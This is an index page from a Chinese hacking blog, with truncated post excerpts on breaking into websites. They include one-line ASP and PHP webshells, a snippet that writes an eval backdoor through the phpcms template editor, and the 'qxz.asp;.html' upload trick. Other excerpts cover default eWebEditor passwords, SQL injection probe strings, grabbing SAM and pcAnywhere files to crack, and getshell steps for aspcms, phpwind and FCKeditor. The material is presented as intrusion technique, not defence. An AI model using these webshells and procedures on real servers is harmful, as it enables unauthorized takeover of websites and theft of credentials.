• 各种网络环境渗透测试简单分析

    各种网络环境渗透测试简单分析 一、渗透测试概念 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方 法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全...阅读全文
    作者:qxz_xp | 发布:2013年12月01日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
  • 服务器提权之webshell提权总结

    服务器提权之webshell提权的一些经验总结。 第一,WEBSHELL 权限提升技巧 C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的 CIF 文件,破解得到 pcAnywhere密码,登陆. c:\ProgramFiles\serv-u\ C:\WINNT\system32\config\ 下它的 SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是 erveryone...阅读全文
    作者:qxz_xp | 发布:2013年11月27日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
  • 入侵网站时的十种小经验

    入侵网站时的十种小经验 1.例如我们的目标网址为“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/forum/index.PHP后再浏览看看是否存在页面,如果存在的话,则服务器所使用的系统为windows,如果显示不存在,则服务器很有可能使用的是Linux 2. Ewebeditor拿站的新技巧 Ewebeditor 大家应该是再熟悉不过的吧?先用默认密码admin888登陆,不行就下...阅读全文
    作者:qxz_xp | 发布:2013年11月27日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
  • 剑眉大侠提权笔记

    【 web提权 】 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制...阅读全文
    作者:qxz_xp | 发布:2013年11月22日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
  • FCK突破建立文件夹后台拿shell

             今天准备搞一个站,在此站搞了一翻后发现此站没有找到可利用的漏洞,此时就有点感觉蛋疼了,所以就想找个旁站来提权,扫描了一下旁站 我靠没有几个站点,后来在经过一翻努力下,终于还是登录进了一个站的后台,在后台瞧了一会,发现是FCK编辑器,哈 有点希望了,马上想到用FCK的突破建立文件夹的漏洞试下。下面就写下FCK突破建立文件夹后台拿shell方法,这个百度里...阅读全文
    作者:qxz_xp | 发布:2013年11月18日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
  • 记一次phpcms v9后台拿shell过程

    记一次phpcms v9后台拿shell过程 登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图: 然后点击 search 这个文件夹,如下图: 然后点击修改 index.html 文件 然后把以下代码复制上去提交。 <? $fp = @fopen(“qxz.php”, ‘a’); @fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST...阅读全文
    作者:qxz_xp | 发布:2013年11月17日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 3条评论
  • 详解ASP PHP脚本渗透入侵过程

    简单判定有无漏洞: 粗略型:’ 1. 数字型: and 1=1 and 1=2 2.字符型: ‘ and ’1′=’1 ‘ and ’1′=’2 3.搜索型: %’ and 1=1 and ‘%’=’% 或者 %’ and 1=2 and ‘%’=’% (PS:第三个大家可能不常用,他一般在ASP脚本中一般写成:keyword=request(”keyword”),赋值“KYO”到SQL语句中的时候即变为Select * from 表名 where keyword like ‘%KYO%’) 简单判断数据库信...阅读全文
    作者:qxz_xp | 发布:2013年11月08日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
  • aspcms后台拿shell的两种方法

    aspcms后台拿shell的两种方法: 第一种:点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写qxz.asp;.html, 在文件内容写一句话 <%eval request(“qxz”)%> 然后点击添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话:qxz.asp;.html 点这个文件就会弹出插入一句话的页面,OK然后菜刀连接。 第二种:前台留言插入一句话,这个要...阅读全文
    作者:qxz_xp | 发布:2013年11月04日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
  • 良精南方后台简单拿shell

    首先必须要先登入管理后台。 进入后台管理后,在网站地址后面加上 admin/southidceditor/admin_style.asp  这是良精南方的远程编辑器路径。 如:http://www.xxx.com/admin/southidceditor/admin_style.asp  OK是不是看到了我们大家比较熟悉的ewebeditor编辑器界面了。 然后后面就不用多说了吧,随便找一个样式在图片那里加上 asp 点击预览,上传大马,如点击上传图片没有...阅读全文
    作者:qxz_xp | 发布:2013年11月02日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 6条评论
  • phpwind后台getshell方法

    在phpwind后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell. 一、先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(此处文件名为php.php)。 manifest.xml代码如下: <?xml version="1.0" encoding="gbk"?> <manifest> <application> <name>getshell</name> <alias>getshell</...阅读全文
    作者:qxz_xp | 发布:2013年11月01日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论